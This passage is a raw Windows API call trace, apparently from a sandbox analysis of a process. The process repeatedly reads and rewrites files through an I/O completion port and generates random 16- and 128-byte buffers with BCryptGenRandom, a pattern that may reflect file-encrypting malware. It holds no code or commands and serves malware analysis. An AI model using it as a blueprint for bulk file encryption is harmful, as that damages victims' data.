nNumberOfBytesToRead=0x7992, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.034] CloseHandle (hObject=0x3ac) returned 1 [0110.036] free (_Block=0x1ff1e60) [0110.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.047] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.048] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.048] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.048] free (_Block=0x77d800) [0110.048] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.048] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.048] free (_Block=0x1fa4848) [0110.048] free (_Block=0x2071818) [0110.048] free (_Block=0x77d908) [0110.048] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.050] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.050] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.063] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x73bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.065] CloseHandle (hObject=0x3ac) returned 1 [0110.069] free (_Block=0x1ff1e60) [0110.070] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.083] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.083] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.084] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.084] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.084] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.084] free (_Block=0x77d800) [0110.084] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.084] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.085] free (_Block=0x1fa4848) [0110.085] free (_Block=0x2071818) [0110.085] free (_Block=0x77d908) [0110.085] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.085] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.085] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.086] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.100] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.100] CloseHandle (hObject=0x3ac) returned 1 [0110.102] free (_Block=0x1ff1e60) [0110.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.162] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.162] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.163] free (_Block=0x77d800) [0110.163] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.163] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.163] free (_Block=0x1fa4848) [0110.163] free (_Block=0x2071818) [0110.163] free (_Block=0x77d908) [0110.163] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.165] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.166] CloseHandle (hObject=0x3ac) returned 1 [0110.166] free (_Block=0x1ff1e60) [0110.166] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.175] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.175] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.175] free (_Block=0x77d800) [0110.175] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.175] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.175] free (_Block=0x1fa4848) [0110.175] free (_Block=0x2071818) [0110.175] free (_Block=0x77d908) [0110.175] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.177] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.178] CloseHandle (hObject=0x3ac) returned 1 [0110.178] free (_Block=0x1ff1e60) [0110.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.188] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.188] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.188] free (_Block=0x77d800) [0110.188] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.188] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.189] free (_Block=0x1fa4848) [0110.189] free (_Block=0x2071818) [0110.189] free (_Block=0x77d908) [0110.189] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.189] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.203] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x44b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.206] CloseHandle (hObject=0x3ac) returned 1 [0110.211] free (_Block=0x1ff1e60) [0110.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.219] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.219] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.219] free (_Block=0x77d800) [0110.219] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.219] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.219] free (_Block=0x1fa4848) [0110.219] free (_Block=0x2071818) [0110.219] free (_Block=0x77d908) [0110.219] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.221] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.231] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa7f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.232] CloseHandle (hObject=0x3ac) returned 1 [0110.234] free (_Block=0x1ff1e60) [0110.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.241] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.241] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.241] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.241] free (_Block=0x77d800) [0110.241] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.241] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.242] free (_Block=0x1fa4848) [0110.242] free (_Block=0x2071818) [0110.242] free (_Block=0x77d908) [0110.242] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.242] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.354] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.355] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.357] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0110.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.357] CloseHandle (hObject=0x81c) returned 1 [0110.377] free (_Block=0x3e70008) [0110.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.189] WriteFile (in: hFile=0x344, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.191] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.225] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.225] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.225] free (_Block=0x77d7a8) [0112.225] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.225] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.226] free (_Block=0x2071c20) [0112.226] free (_Block=0x2071d30) [0112.226] free (_Block=0x77d8b0) [0112.226] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.239] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.239] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.239] free (_Block=0x77d7a8) [0112.239] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.239] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.240] free (_Block=0x2071c20) [0112.240] free (_Block=0x2071d30) [0112.240] free (_Block=0x77d8b0) [0112.240] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.247] CloseHandle (hObject=0x3bc) returned 1 [0112.249] free (_Block=0x3e70008) [0112.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.260] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xb90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0112.260] GetQueuedCompletionStatus (in: 